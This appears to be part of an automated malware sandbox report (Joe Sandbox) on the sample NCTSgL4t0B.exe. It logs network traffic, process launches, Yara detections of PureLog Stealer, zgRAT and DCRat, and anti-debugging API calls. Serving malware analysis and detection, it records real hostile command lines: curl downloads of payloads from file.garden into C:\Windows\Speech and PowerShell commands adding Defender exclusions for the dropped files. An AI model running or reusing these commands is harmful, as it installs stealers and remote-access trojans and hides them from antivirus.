2024-09-30 16:33:36 UTC	16384	IN	Data Raw: 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f Data Ascii: ss': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_actio
2024-09-30 16:33:36 UTC	3768	IN	Data Raw: 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a Data Ascii: eLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content ">
2024-09-30 16:33:36 UTC	12	IN	Data Raw: 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: dy></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49706	172.67.197.40	443	7312	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:33:37 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offeviablwke.site
2024-09-30 16:33:37 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-30 16:33:37 UTC	776	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:33:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=48e2tn57pq9nvk0eko0g5kild5; expires=Fri, 24 Jan 2025 10:20:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YwOESkzEMbXa3xmC7KvNg2j3%2F5mSSTBoXC5ONSMvdSIszLMEtrrLUIfrCxg2SxJ%2FlWIG7FRObV8cUCTagtkvm7e8HfVkfg0xQRPPDuVd%2FDsMpSmN5cmGkhGyg4%2BTmmUg4QhZ8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb59d9f6b79431b-EWR
2024-09-30 16:33:37 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-30 16:33:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	12:33:23
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\NCTSgL4t0B.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\NCTSgL4t0B.exe"
Imagebase:	0x7ff735da0000
File size:	628'224 bytes
MD5 hash:	76B682B895587819CC3293CC109D3EB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:33:23
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:33:27
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff782790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:33:27
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff7eef80000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:33:30
Start date:	30/09/2024
Path:	C:\Windows\Speech\kdmapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\kdmapper.exe"
Imagebase:	0xde0000
File size:	2'284'739 bytes
MD5 hash:	C85ABE0E8C3C4D4C5044AEF6422B8218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1308955813.0000000006617000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1309568242.0000000006614000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus matches:	Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:33:30
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff782790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:33:30
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff7eef80000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:33:31
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Imagebase:	0x250000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:33:32
Start date:	30/09/2024
Path:	C:\Windows\Speech\physmeme.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\physmeme.exe"
Imagebase:	0xae0000
File size:	370'176 bytes
MD5 hash:	D6EDF37D68DA356237AE14270B3C7A1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:33:32
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	12:33:34
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x850000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:33:46
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	12:33:46
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:33:46
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge/msedge.exe"
Imagebase:	0x160000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000000.1467994457.0000000000162000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1537440310.00000000126C9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:24:38
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
Imagebase:	0x7ff69ba60000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:24:38
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	14:24:38
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP"
Imagebase:	0x7ff7b92b0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:24:38
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
Imagebase:	0x7ff69ba60000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	14:24:39
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	14:24:39
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp" "c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP"
Imagebase:	0x7ff7b92b0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Idle.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Idle.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Idle.exe
Imagebase:	0x490000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Idle.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Idle.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Idle.exe
Imagebase:	0xac0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0x6f0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	C:\Edge\msedge.exe
Imagebase:	0xd20000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat"
Imagebase:	0x7ff782790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	14:24:40
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6b9840000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	14:24:41
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff67ab10000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	14:24:44
Start date:	30/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff7fb730000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	49
Start time:	14:24:48
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge\msedge.exe"
Imagebase:	0xfb0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	14:24:52
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat"
Imagebase:	0x7ff782790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	14:24:52
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	14:24:52
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6b9840000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	14:24:52
Start date:	30/09/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff67ab10000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	14:24:52
Start date:	30/09/2024
Path:	C:\Users\user\AppData\Local\Idle.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Idle.exe"
Imagebase:	0x1a0000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	14:24:55
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat" "
Imagebase:	0x7ff782790000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	14:24:55
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	14:24:55
Start date:	30/09/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6b9840000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	132
Start time:	14:26:04
Start date:	30/09/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.9%
Total number of Nodes:	598
Total number of Limit Nodes:	12

Executed Functions

Function 00007FF735DD4BF0 Relevance: 118.9, APIs: 63, Strings: 4, Instructions: 1636librarythreadnativeCOMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00007FF735DD4C1F
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD4EB1
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD4EBC
GetCurrentProcess.KERNEL32 ref: 00007FF735DD4EC9
CheckRemoteDebuggerPresent.KERNELBASE ref: 00007FF735DD4ED7
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD5181
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD518C
LoadLibraryA.KERNEL32 ref: 00007FF735DD51A2
GetProcAddress.KERNEL32 ref: 00007FF735DD51B2
GetCurrentProcess.KERNEL32 ref: 00007FF735DD51BB
NtQueryInformationProcess.NTDLL ref: 00007FF735DD51D6
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD5491
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD549C
memset.VCRUNTIME140 ref: 00007FF735DD54B0
GetCurrentThread.KERNEL32 ref: 00007FF735DD54BC
GetThreadContext.KERNEL32 ref: 00007FF735DD54CA

Strings

ntdll.dll, xrefs: 00007FF735DD5193, 00007FF735DD6107
0000000000000000, xrefs: 00007FF735DD4F45, 00007FF735DD524D, 00007FF735DD63C5
NtQueryInformationProcess, xrefs: 00007FF735DD51AB
NtSetInformationThread, xrefs: 00007FF735DD6117

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
